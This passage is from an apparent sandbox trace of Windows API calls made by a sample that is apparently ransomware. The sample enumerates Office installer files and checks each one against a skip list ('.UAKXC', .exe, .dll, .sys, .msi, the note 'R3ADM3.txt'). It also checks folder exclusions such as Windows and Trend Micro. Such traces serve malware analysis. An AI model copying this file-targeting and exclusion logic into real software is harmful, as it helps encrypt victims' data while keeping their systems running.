(lpFirst="ExcelMUI.msi", lpSrch=".msi") returned=".msi" [0141.722] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0141.722] lstrcmpW (lpString1="ExcelMUI.xml", lpString2=".") returned 1 [0141.722] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="..") returned 1 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".UAKXC") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".exe") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".dll") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".lnk") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".sys") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".msi") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0141.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3028 [0141.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0141.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0141.722] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.723] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.723] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0141.723] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0141.723] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0141.723] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0141.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3050 [0141.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0141.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".UAKXC") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".exe") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".dll") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".lnk") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".sys") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".msi") returned=".msi" [0141.923] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0141.923] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2=".") returned 1 [0141.923] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="..") returned 1 [0141.923] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".UAKXC") returned 0x0 [0141.923] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".exe") returned 0x0 [0141.924] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".dll") returned 0x0 [0141.924] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".lnk") returned 0x0 [0141.924] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".sys") returned 0x0 [0141.924] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".msi") returned 0x0 [0141.924] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".UAKXC") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".exe") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".dll") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".lnk") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".sys") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch=".msi") returned 0x0 [0141.924] StrStrIW (lpFirst="PptLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0141.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.925] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.925] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0141.925] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0141.925] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0141.925] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.274] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".UAKXC") returned 0x0 [0142.274] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".exe") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".dll") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".lnk") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".sys") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".msi") returned=".msi" [0142.275] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0142.275] lstrcmpW (lpString1="PublisherMUI.xml", lpString2=".") returned 1 [0142.275] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="..") returned 1 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".UAKXC") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".exe") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".dll") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".lnk") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".sys") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".msi") returned 0x0 [0142.275] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0142.275] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0142.275] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.275] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0142.275] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.275] StrStrIW (lpFirst="PubLR.cab", lpSrch=".UAKXC") returned 0x0 [0142.275] StrStrIW (lpFirst="PubLR.cab", lpSrch=".exe") returned 0x0 [0142.275] StrStrIW (lpFirst="PubLR.cab", lpSrch=".dll") returned 0x0 [0142.275] StrStrIW (lpFirst="PubLR.cab", lpSrch=".lnk") returned 0x0 [0142.276] StrStrIW (lpFirst="PubLR.cab", lpSrch=".sys") returned 0x0 [0142.276] StrStrIW (lpFirst="PubLR.cab", lpSrch=".msi") returned 0x0 [0142.276] StrStrIW (lpFirst="PubLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0142.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0142.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0142.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0142.276] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0142.276] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0142.276] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0142.276] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0142.276] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0142.276] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0142.276] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0142.276] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0142.276] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0142.277] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0142.277] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0142.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0142.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0142.277] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".UAKXC") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".exe") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".dll") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".lnk") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".sys") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".msi") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlkLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0142.806] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0142.806] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0142.806] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.806] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.806] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".UAKXC") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".exe") returned 0x0 [0142.806] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".dll") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".lnk") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".sys") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".msi") returned=".msi" [0142.807] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0142.807] lstrcmpW (lpString1="OutlookMUI.xml", lpString2=".") returned 1 [0142.807] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="..") returned 1 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".UAKXC") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".exe") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".dll") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".lnk") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".sys") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".msi") returned 0x0 [0142.807] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0142.807] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeace0 [0142.807] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0142.807] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.807] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0142.807] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0142.807] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0142.807] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0142.807] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0142.808] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0142.808] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0142.808] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0142.808] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0142.808] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0142.808] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0142.808] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0142.808] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3078 [0142.808] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0142.808] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0142.808] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0143.180] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0143.180] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.180] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0143.180] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0143.180] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.180] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3208 [0143.180] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.180] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0143.181] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".UAKXC") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".exe") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".dll") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".lnk") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".sys") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch=".msi") returned 0x0 [0143.181] StrStrIW (lpFirst="WordLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0143.181] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3230 [0143.181] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.181] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0143.181] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".UAKXC") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".exe") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".dll") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".lnk") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".sys") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".msi") returned=".msi" [0143.181] FindNextFileW (in: hFindFile=0xecfba0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0143.181] lstrcmpW (lpString1="WordMUI.xml", lpString2=".") returned 1 [0143.181] lstrcmpW (lpString1="WordMUI.xml", lpString2="..") returned 1 [0143.181] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".UAKXC") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".exe") returned 0x0 [0143.181] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".dll") returned 0x0 [0143.182] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".lnk") returned 0x0 [0143.182] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".sys") returned 0x0 [0143.182] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".msi") returned 0x0 [0143.182] StrStrIW (lpFirst="WordMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0143.182] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3258 [0143.182] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0143.182] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0143.182] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="tmp") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="winnt") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="temp") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="thumb") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="$Recycle.Bin") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="$RECYCLE.BIN") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="System Volume Information") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="Boot") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="Windows") returned 0x0 [0143.387] StrStrIW (lpFirst="Proof.en", lpSrch="Trend Micro") returned 0x0 [0143.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 